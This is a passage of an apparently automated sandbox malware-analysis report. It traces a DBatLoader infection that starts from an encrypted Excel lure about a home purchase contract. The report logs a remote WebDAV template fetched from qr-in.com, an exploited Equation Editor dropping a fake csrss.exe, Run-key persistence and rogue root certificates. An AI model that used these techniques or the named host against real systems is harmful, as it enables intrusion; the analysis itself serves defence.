Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??????s?s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Section loaded: ??.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp

Source: ~DF78F515A159E2AA69.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Home Purchase Contract and Property Details.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 11.2.Efftwcmk.PIF.2c70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Efftwcmk.PIF.2c70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D54D86 GetSystemDirectoryA,LoadLibraryA,LoadLibraryA,GetProcAddress,

8_2_33D54D86

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D97106 push ecx; ret	8_2_33D97119
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D74E56 push ecx; ret	8_2_33D74E69
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D486A6 push E833DA64h; iretd	8_2_33D486AB
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C992FC push 02C99367h; ret	11_2_02C9935F
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C732FC push eax; ret	11_2_02C73338
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C8D204 push ecx; mov dword ptr [esp], edx	11_2_02C8D209
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C7635C push 02C763B7h; ret	11_2_02C763AF
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C7635A push 02C763B7h; ret	11_2_02C763AF
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C990AC push 02C99125h; ret	11_2_02C9911D
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C991F8 push 02C99288h; ret	11_2_02C99280
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C99144 push 02C991ECh; ret	11_2_02C991E4
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C7672E push 02C76772h; ret	11_2_02C7676A
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C76730 push 02C76772h; ret	11_2_02C7676A
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C7C4E4 push ecx; mov dword ptr [esp], edx	11_2_02C7C4E9
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C7D518 push 02C7D544h; ret	11_2_02C7D53C
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C7CB64 push 02C7CCEAh; ret	11_2_02C7CCE2
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C7CB63 push 02C7CCEAh; ret	11_2_02C7CCE2
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C868C0 push 02C8696Bh; ret	11_2_02C86963
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87884 push 02C87901h; ret	11_2_02C878F9
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C868BE push 02C8696Bh; ret	11_2_02C86963
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C82ED8 push 02C82F4Eh; ret	11_2_02C82F46
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87ED0 push 02C87F08h; ret	11_2_02C87F00
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C89E74 push 02C89EACh; ret	11_2_02C89EA4
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C82FE3 push 02C83031h; ret	11_2_02C83029
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C82FE4 push 02C83031h; ret	11_2_02C83029
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C97F60 push 02C98124h; ret	11_2_02C9811C
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C9CF18 push eax; ret	11_2_02C9CFE8
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87C5C push 02C87C9Eh; ret	11_2_02C87C96
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C85DF4 push ecx; mov dword ptr [esp], edx	11_2_02C85DF6
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D254E56 push ecx; ret	11_2_2D254E69
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D277A28 push eax; ret	11_2_2D277A46

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\qr-in.com\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\qr-in.com\DavWWWRoot			Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\Libraries\Efftwcmk.PIF

Jump to dropped file

Drops PE files with benign system names

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Roaming\csrss.exe

Jump to dropped file

Installs new ROOT certificates

Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\csrss.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Efftwcmk.PIF	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,

8_2_33D5AB0D

Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Efftwcmk			Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Efftwcmk			Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D75E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_33D75E5E

Source: C:\Users\user\AppData\Roaming\csrss.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
